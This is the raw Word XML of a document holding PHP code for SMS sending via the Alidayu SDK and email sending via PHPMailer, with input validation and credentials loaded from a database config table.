    <w:p w14:paraId="3D6E52D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$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6DE0E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['param','require|array','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必填</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参数必须为数组</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5A82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['mobile','require|/1[34578]{1}\d{9}$/','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手机号错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="613F990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['template','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDFC98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27446F7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 (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0775972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$validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45357CD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3003996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define('TOP_SDK_WORK_DIR', CACHE_PATH.'sms_tmp/');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1521C97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define('TOP_SDK_DEV_MODE', false);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3A65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ab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>vendor('alidayu.TopClient');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C2F7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vendor('alidayu.AlibabaAliqinFcSmsNumSendRequest');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26968F6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vendor('alidayu.RequestCheckUtil');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79071BE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vendor('alidayu.ResultSet');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C7734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vendor('alidayu.TopLogger');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9EEB9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$config = Db::name('member_config')-&gt;where('type','sdkMobile')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C02C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$sdkAppkey=$config[0]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="54739E7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$sdkSecretKey=$config[1]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7293268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$sdkQianming=$config[2]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1239E7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$sdkReg=$config[3]['text'];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p>
    <w:p w14:paraId="5262C29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$sdkPwd=$config[4]['text'];</w:t>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p>
    <w:p w14:paraId="31D0941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$sdkMobile=$config[5]['text'];</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CD2F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$c = new \TopClient;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9AE41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$c-&gt;appkey = $sdkAppkey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C725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$c-&gt;secretKey = $sdkSecretKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282C1BE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$req = new \AlibabaAliqinFcSmsNumSendRequest;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F361BC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$req-&gt;setExtend('');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D516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$req-&gt;setSmsType('normal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBFED7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$req-&gt;setSmsFreeSignName($sdkQianming);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4405245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$req-&gt;setSmsParam(json_encode($data['param']));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145066C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$req-&gt;setRecNum($data['mobile']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8421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$req-&gt;setSmsTemplateCode($data['template']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4715A8E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$result = $c-&gt;execute($req);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FDAE3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dump($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331136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exit();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36768A6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$result = $this-&gt;_simplexml_to_array($result);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA8881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if(isset($result['code'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687A42D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$result['sub_code'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3563BDAD"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4E7061D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return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4865BC8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01FEA84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private function _simplexml_to_array($obj)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218AF48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6AD3AA1F"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if(count($obj) &gt;= 1){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532584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$result = $keys = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07708C2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foreach($obj as $key=&gt;$value){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BDAC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isset($keys[$key]) ? ($keys[$key] += 1) : ($keys[$key] = 1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E8F9FC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if( $keys[$key] == 1 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F0DFF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$result[$key] = $this-&gt;_simplexml_to_array($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CC142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}elseif( $keys[$key] == 2 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E73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$result[$key] = [$result[$key], $this-&gt;_simplexml_to_array($value)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1243C7"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}else if( $keys[$key] &gt; 2 ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BF056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$result[$key][] = $this-&gt;_simplexml_to_array($value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503E3D2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7EBC854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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2152415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$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA1C8A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}else if(count($obj) == 0){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389C6A6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(string)$obj;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AB4F2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3E07910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4353DD4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public function email($data=[]){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035C28C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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>$validate = new Validate([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0194770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['email','require|email','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱输入错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>邮箱输入错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6947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['content','require','</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入邮件内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C99918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7A711BF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if (!$validate-&gt;check($data)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6049F15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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>return $validate-&gt;getError();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBD1E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337028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$config = Db::name('member_config')-&gt;where('type','sdkEmail')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D7BFB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$sdkEmailHhost=$config[0]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE390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$sdkEmailUsername=$config[1]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7835D0F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$sdkEmailPwd=$config[2]['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439EC084"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$title=config('config')['title'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4C5CB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vendor('phpmailer.phpmailer');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D033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 = new \phpmailer(); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C113B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$phpmailer-&gt;Host</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailHhost; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D6EC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$phpmailer-&gt;SMTPAuth </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">TRUE; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2F9D5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$phpmailer-&gt;Username </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailUsername; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3CC61"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$phpmailer-&gt;Password </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailPwd; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB45A82"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$phpmailer-&gt;From </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$sdkEmailUsername; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4501330C"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$phpmailer-&gt;FromName </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$title; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A103D15"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$phpmailer-&gt;CharSet</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">'utf-8'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0433C8"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$phpmailer-&gt;Subject </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$title; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084361B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$phpmailer-&gt;Body </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$data['content']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C096096"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$phpmailer-&gt;AltBody </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">$data['content']; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECB1490"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$phpmailer-&gt;WordWrap </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">50; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE0A96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$phpmailer-&gt;IsSMTP(true);</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28CF02F9"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 xml:space="preserve">$phpmailer-&gt;IsHTML(true); </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B1D34A"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$phpmailer-&gt;AddAddress($data['email']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490386A3"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$status = $phpmailer-&gt;Send();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751035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r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>return true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FAF30E"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4B4BFB" w14:textId="77777777"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D73DC" w14:textId="10214B61" w:rsidR="00652339" w:rsidRPr="008320C6" w:rsidRDefault="00652339" w:rsidP="007C0EE1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:line="280" w:lineRule="exact"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00652339" w:rsidRPr="008320C6" w:rsidSect="008320C6">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1157" w:right="1440" w:bottom="1157" w:left="144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739A" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="008320C6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="6F6572B1" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="0083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5942" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="008320C6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="636EF959" w14:textId="77777777" w:rsidR="00814E34" w:rsidRDefault="00814E34" w:rsidP="0083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894724"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:p w14:paraId="3E59D292" w14:textId="0E575BAD" w:rsidR="00FA6346" w:rsidRDefault="00FA6346">
        <w:pPr>
          <w:pStyle w:val="a5"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText>PAGE   \* MERGEFORMAT</w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:lang w:val="zh-CN"/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:p>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="71FEFC77" w14:textId="77777777" w:rsidR="00FA6346" w:rsidRDefault="00FA634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56CDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED0A3AE6"/>
    <w:lvl w:ilvl="0" w:tplc="7668015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14"/>
    <w:rsid w:val="005242CB"/>
    <w:rsid w:val="00652339"/>
    <w:rsid w:val="007C0EE1"/>
    <w:rsid w:val="00814E34"/>
    <w:rsid w:val="008320C6"/>
    <w:rsid w:val="00847914"/>
    <w:rsid w:val="00A54CE5"/>
    <w:rsid w:val="00FA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98E9D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E5BD9A04-264D-4F20-94A9-B1FA75B5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E02ED"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a4">
    <w:name w:val="纯文本 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a3"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="009E02ED"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="header"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00832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320C6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a8"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="008320C6"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="a8">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="a7"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="008320C6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="line number"/>
